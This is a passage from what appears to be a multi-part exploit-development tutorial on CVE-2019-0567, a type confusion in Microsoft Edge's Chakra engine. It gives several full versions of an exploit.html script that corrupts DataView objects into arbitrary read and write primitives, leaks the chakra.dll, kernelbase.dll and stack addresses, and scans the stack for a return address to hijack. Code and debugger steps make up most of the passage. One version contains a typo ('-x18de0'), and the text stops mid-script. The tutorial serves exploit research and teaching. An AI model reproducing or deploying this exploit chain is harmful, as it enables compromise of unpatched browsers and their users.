The way this works is that the out-of-process JIT server will actually take any JIT’d code that needs to be executed, and it will inject it into the content processes that contain the JavaScript code to be executed with proper permissions that are ACG complaint (generally readable/executable). So, at a high level, this out-of-process JIT server performs process injection to map the JIT’d code into the content processes (which has ACG enabled). This allows the Edge content processes, which are responsible for handling untrusted code like a web page that hosts malicious JavaScript to perform memory corruption (e.g. exploit.html), to have full ACG support.

Lastly, we have the MicrosoftEdge.exe process which is known as the browser process. It is the “main” process which helps to manage things like network requests and file access.

Armed with the above information, let’s now turn our attention back to Process Hacker.

The obvious point we can make is that when we do our exploit debugging, we know the content process is responsible for execution of the JavaScript code within our web page - meaning that it is the process we need to debug as it will be responsible for execution of our exploit. However, since the out-of-process JIT server is technically named as a content process, this makes for two instances of MicrosoftEdgeCP.exe. How do we know which is the out-of-process JIT server and which is the actual content process? This probably isn’t the best way to tell, but the way I figured this out with approximately 100% accuracy is by looking at the two content processes (MicrosoftEdgeCP.exe) and determining which one uses up more RAM. In my testing, the process which uses up more RAM is the target process for debugging (as it is significantly more, and makes sense as the content process has to load JavaScript, HTML, and CSS code into memory for execution). With that in mind, we can break down the process tree as such (based on the Process Hacker image above):

  1. MicrosoftEdge.exe - PID 3740 (browser process)
  2. MicrosoftEdgeCP.exe - PID 2668 (out-of-process JIT server)
  3. MicrosoftEdgeCP.exe - PID 2512 (content process - our “exploiting process” we want to debug).

With the aforementioned knowledge we can attach PID 2512 (our content process, which will likely differ on your machine) to WinDbg and know that this is the process responsible for execution of our JavaScript code. More importantly, this process loads the Chakra JavaScript engine DLL, chakra.dll.

After confirming chakra.dll is loaded into the process space, we then can click out Click me to exploit CVE-2019-0567 button (you may have to click it twice). This will run our exploit, and from here we can calculate the distance to chakra.dll in order to compute the base of chakra.dll.

As we can see above, the leaked vftable pointer is 0x5d0bf8 bytes away from chakra.dll. We can then update our exploit script to the following code, and confirm this to be the case.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");
}
</script>

After computing the base address of chakra.dll the next thing we need to do is, as shown in part two, leak an import address table (IAT) entry that points to kernel32.dll (in this case kernelbase.dll, which contains all of the functionality of kernel32.dll).

Using the same debugging session, or a new one if you prefer (following the aforementioned steps to locate the content process), we can locate the IAT for chakra.dll with the !dh command.

If we dive a bit deeper into the IAT, we can see there are several pointers to kernelbase.dll, which contains many of the important APIs such as VirtualProtect we need to bypass DEP and ACG. Specifically, for our exploit, we will go ahead and extract the pointer to kernelbase!DuplicateHandle as our kernelbase.dll leak, as we will need this API in the future for our ACG bypass.

What this means is that we can use our read primitive to read what chakra_base+0x5ee2b8 points to (which is a pointer into kernelbase.dll). We then can compute the base address of kernelbase.dll by subtracting the offset to DuplicateHandle from the base of kernelbase.dll in the debugger.

We now know that DuplicateHandle is 0x18de0 bytes away from kernelbase.dll’s base address. Armed with the following information, we can update exploit.html as follows and detonate it.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");
}
</script>

We are now almost done porting our exploit primitives to Edge from ChakraCore. As we can recall from our ChakraCore exploit, the last thing we need to do now is leak a stack address/the stack in order to bypass CFG for control-flow hijacking and code execution.

Recall that this information derives from this Google Project Zero issue. As we can recall with our ChakraCore exploit, we computed these offsets in WinDbg and determined that ChakraCore leveraged slightly different offsets. However, since we are now targeting Edge, we can update the offsets to those mentioned by Ivan Fratric in this issue.

However, even though the type->scriptContext->threadContext offsets will be the ones mentioned in the Project Zero issue, the stack address offset is slightly different. We will go ahead and debug this with alert() statements.

We know we have to leak a type pointer (which we already have stored in exploit.html the same way as part two of this blog series) in order to leak a stack address. Let’s update our exploit.html with a few items to aid in our debugging for leaking a stack address.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // ---------------------------------------------------------------------------------------------

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Spawn an alert dialogue to pause execution
    alert("DEBUG");
}
</script>

As we can see, we have added a document.write() call to print out the address of our type pointer (from which we will leak a stack address) and then we also added an alert() call to create an “alert” dialogue. Since JavaScript will use temporary virtual memory (e.g. memory that isn’t really backed by disk in the form of a 0x7fff address that is backed by a loaded DLL) for objects, this address is only “consistent” for the duration of the process. Think of this in terms of ASLR - when, on Windows, you reboot the system, you can expect images to be loaded at different addresses. This is synonymous with the longevity of the address/address space used for JavaScript objects, except that it is on a “per-script basis” and not a per-boot basis (“per-script” basis is a made-up word by myself to represent the fact the address of a JavaScript object will change after each time the JavaScript code is ran). This is the reason we have the document.write() call and alert() call. The document.write() call will give us the address of our type object, and the alert() dialogue will actually work, in essence, like a breakpoint in that it will pause execution of JavaScript, HTML, or CSS code until the “alert” dialogue has been dealt with. In other words, the JavaScript code cannot be fully executed until the dialogue is dealt with, meaning all of the JavaScript code is loaded into the content process and cannot be released until it is dealt with. This will allow us examine the type pointer before it goes out of scope, and so we can examine it. We will use this same “setup” (e.g. alert() calls) to our advantage in debugging in the future.

If we run our exploit two separate times, we can confirm our theory about the type pointer changing addresses each time the JavaScript executes

Now, for “real” this time, let’s open up exploit.html in Edge and click the Click me to exploit CVE-2019-0567 button. This should bring up our “alert” dialogue.

As we can see, the type pointer is located at 0x1ca40d69100 (note you won’t be able to use copy and paste with the dialogue available, so you will have to manually type this value). Now that we know the address of the type pointer, we can use Process Hacker to locate our content process.

As we can see, the content process which uses the most RAM is PID 6464. This is our content process, where our exploit is currently executing (although paused). We now can use WinDbg to attach to the process and examine the memory contents of 0x1ca40d69100.

After inspecting the memory contents, we can confirm that this is a valid address - meaning our type pointer hasn’t gone out of scope! Although a bit of an arduous process, this is how we can successfully debug Edge for our exploit development!

Using the Project Zero issue as a guide, and leveraging the process outlined in part two of this blog series, we can talk various pointers within this structure to fetch a stack address!

The Google Project Zero issue explains that we essentially can just walk the type pointer to extract a ScriptContext structure which, in turn, contains ThreadContext. The ThreadContext structure is responsible, as we have see, for storing various stack addresses. Here are the offsets:

  1. type + 0x8 = JavaScriptLibrary
  2. JavaScriptLibrary + 0x430 = ScriptContext
  3. ScriptContext + 0x5c0 = ThreadContext

In our case, the ThreadContext structure is located at 0x1ca3d72a000.

Previously, we leaked the stackLimitForCurrentThread member of ThreadContext, which gave us essentially the stack limit for the exploiting thread. However, take a look at this address within Edge (located at ThreadContext + 0x4f0)

If we try to examine the memory contents of this address, we can see they are not committed to memory. This obviously means this address doesn’t fall within the bounds of the TEB’s known stack address(es) for our current thread.

As we can recall from part two, this was also the case. However, in ChakraCore, we could compute the offset from the leaked stackLimitForCurrentThread consistently between exploit attempts. Let’s compute the distance from our leaked stackLimitForCurrentThread with the actual stack limit from the TEB.

Here, at this point in the exploit, the leaked stack address is 0x1cf0000 bytes away from the actual stack limit we leaked via the TEB. Let’s exit out of WinDbg and re-run our exploit, while also leaking our stack address within WinDbg.

Our type pointer is located at 0x157acb19100.

After attaching Edge to WinDbg and walking the type object, we can see our leaked stack address via stackLimitForCurrentThread.

As we can see above, when computing the offset, our offset has changed to being 0x1c90000 bytes away from the actual stack limit. This poses a problem for us, as we cannot reliable compute the offset to the stack limit. Since the stack limit saved in the ThreadContext structure (stackForCurrentThreadLimit) is not committed to memory, we will actually get an access violation when attempting to dereference this memory. This means our exploit would be killed, meaning we also can’t “guess” the offset if we want our exploit to be reliable.

Before I pose the solution, I wanted to touch on something I first tried. Within the ThreadContext structure, there is a global variable named globalListFirst. This seems to be a linked-list within a ThreadContext structure which is used to track other instances of a ThreadContext structure. At an offset of 0x10 within this list (consistently, I found, in every attempt I made) there is actually a pointer to the heap.

Since it is possible via stackLimitForCurrentThread to at least leak an address around the current stack limit (with the upper 32-bits being the same across all stack addresses), and although there is a degree of variance between the offset from stackLimitForCurrentThread and the actual current stack limit (around 0x1cX0000 bytes as we saw between our two stack leak attempts), I used my knowledge of the heap to do the following:

  1. Leak the heap from chakra!ThreadContext::globalListFirst
  2. Using the read primitive, scan the heap for any stack addresses that are greater than the leaked stack address from stackLimitForCurrentThread

I found that about 50-60% of the time I could reliably leak a stack address from the heap. From there, about 50% of the time the stack address that was leaked from the heap was committed to memory. However, there was a varying degree of “failing” - meaning I would often get an access violation on the leaked stack address from the heap. Although I was only succeeding in about half of the exploit attempts, this is significantly greater than trying to “guess” the offset from the stackLimitForCurrenThread. However, after I got frustrated with this, I saw there was a much easier approach.

The reason why I didn’t take this approach earlier, is because the stackLimitForCurrentThread seemed to be from a thread stack which was no longer in memory. This can be seen below.

Looking at the above image, we can see only one active thread has a stack address that is anywhere near stackLimitForCurrentThread. However, if we look at the TEB for the single thread, the stack address we are leaking doesn’t fall anywhere within that range. This was disheartening for me, as I assumed any stack address I leaked from this ThreadContext structure was from a thread which was no longer active and, thus, its stack address space being decommitted. However, in the Google Project Zero issue - stackLimitForCurrentThread wasn’t the item leaked, it was leafInterpreterFrame. Since I had enjoyed success with stackLimitForCurrentThread in part two of this blog series, it didn’t cross my mind until much later to investigate this specific member.

If we take a look at the ThreadContext structure, we can see that at offset 0x8f0 that there is a stack address.

In fact, we can see two stack addresses. Both of them are committed to memory, as well!

If we compare this to Ivan’s findings in the Project Zero issue, we can see that he leaks two stack addresses at offset 0x8a0 and 0x8a8, just like we have leaked them at 0x8f0 and 0x8f8. We can therefore infer that these are the same stack addresses from the leafInterpreter member of ThreadContext, and that we are likely on a different version of Windows that Ivan, which likely means a different version of Edge and, thus, the slight difference in offset. For our exploit, you can choose either of these addresses. I opted for ThreadContext + 0x8f8.

Additionally, if we look at the address itself (0x1c2affaf60), we can see that this address doesn’t reside within the current thread.

However, we can clearly see that not only is this thread committed to memory, it is within the known bounds of another thread’s TEB tracking of the stack (note that the below diagram is confusing because the columns are unaligned. We are outlining the stack base and limit).

This means we can reliably locate a stack address for a currently executing thread! It is perfectly okay if we end up hijacking a return address within another thread because as we have the ability to read/write anywhere within the process space, and because the level of “private” address space Windows uses is on a per-process basis, we can still hijack any thread from the current process. In essence, it is perfectly valid to corrupt a return address on another thread to gain code execution. The “lower level details” are abstracted away from us when it comes to this concept, because regardless of what return address we overwrite, or when the thread terminates, it will have to return control-flow somewhere in memory. Since threads are constantly executing functions, we know that at some point the thread we are dealing with will receive priority for execution and the return address will be executed. If this makes no sense, do not worry. Our concept hasn’t changed in terms of overwriting a return address (be it in the current thread or another thread). We are not changing anything, from a foundational perspective, in terms of our stack leak and return address corruption between this blog post and part two of this blog series.

With that being said, here is how our exploit now looks with our stack leak.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");
}
</script>

After running our exploit, we can see that we have successfully leaked a stack address.

From our experimenting earlier, the offsets between the leaked stack addresses have a certain degree of variance between script runs. Because of this, there is no way for us to compute the base and limit of the stack with our leaked address, as the offset is set to change. Because of this, we will forgo the process of computing the stack limit. Instead, we will perform our stack scanning for return addresses from the address we have currently leaked. Let’s recall a previous image outlining the stack limit of the thread where we leaked a stack address at the time of the leak.

As we can see, we are towards the base of the stack. Since the stack grows “downwards”, as we can see with the stack base being located at a higher address than the actual stack limit, we will do our scanning in “reverse” order, in comparison to part two. For our purposes, we will do stack scanning by starting at our leaked stack address and traversing backwards towards the stack limit (which is the highest, technically “lowest” address the stack can grow towards).

We already outlined in part two of this blog post the methodology I used in terms of leaking a return address to corrupt. As mentioned then, the process is as follows:

  1. Traverse the stack using read primitive
  2. Print out all contents of the stack that are possible to read
  3. Look for anything starting with 0x7fff, meaning an address from a loaded module like chakra.dll
  4. Disassemble the address to see if it is an actual return address

While omitting much of the code from our full exploit, a stack scan would look like this (a scan used just to print out return addresses):

(...)truncated(...)

// Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
// Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

// Print update
document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
document.write("<br>");

// Counter variable
let counter = 0x6000;

// Loop
while (counter != 0)
{
    // Store the contents of the stack
    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

    // Print update
    document.write("[+] Stack address 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));
    document.write("<br>");

    // Decrement the counter
    // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
    counter -= 0x8;
}

As we can see above, we do this in “reverse” order of our ChakraCore exploit in part two. Since we don’t have the luxury of already knowing where the stack limit is, which is the “last” address that can be used by that thread’s stack, we can’t just traverse the stack by incrementing. Instead, since we are leaking an address towards the “base” of the stack, we have to decrement (since the stack grows downwards) towards the stack limit.

In other words, less technically, we have leaked somewhere towards the “bottom” of the stack and we want to walk towards the “top of the stack” in order to scan for return addresses. You’ll notice a few things about the previous code, the first being the arbitrary 0x6000 number. This number was found by trial and error. I started with 0x1000 and ran the loop to see if the exploit crashed. I kept incrementing the number until a crash started to ensue. A crash in this case refers to the fact we are likely reading from decommitted memory, meaning we will cause an access violation. The “gist” of this is to basically see how many bytes you can read without crashing, and those are the return addresses you can choose from. Here is how our output looks.

As we start to scroll down through the output, we can clearly see some return address starting to bubble up!

Since I already mentioned the “trial and error” approach in part two, which consists of overwriting a return address (after confirming it is one) and seeing if you end up controlling the instruction pointer by corrupting it, I won’t show this process here again. Just know, as mentioned, that this is just a matter of trial and error (in terms of my approach). The return address that I found worked best for me was chakra!Js::JavascriptFunction::CallFunction<1>+0x83 (again there is no “special” way to find it. I just started corrupting return address with 0x4141414141414141 and seeing if I caused an access violation with RIP being controlled to by the value 0x4141414141414141, or RSP being pointed to by this value at the time of the access violation).

This value can be seen in the stack leaking contents.

Why did I choose this return address? Again, it was an arduous process taking every stack address and overwriting it until one consistently worked. Additionally, a little less anecdotally, the symbol for this return address is with a function quite literally called CallFunction, which means its likely responsible for executing a function call of interpreted JavaScript. Because of this, we know a function will execute its code and then hand execution back to the caller via the return address. It is likely that this piece of code will be executed (the return address) since it is responsible for calling a function. However, there are many other options that you could choose from.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
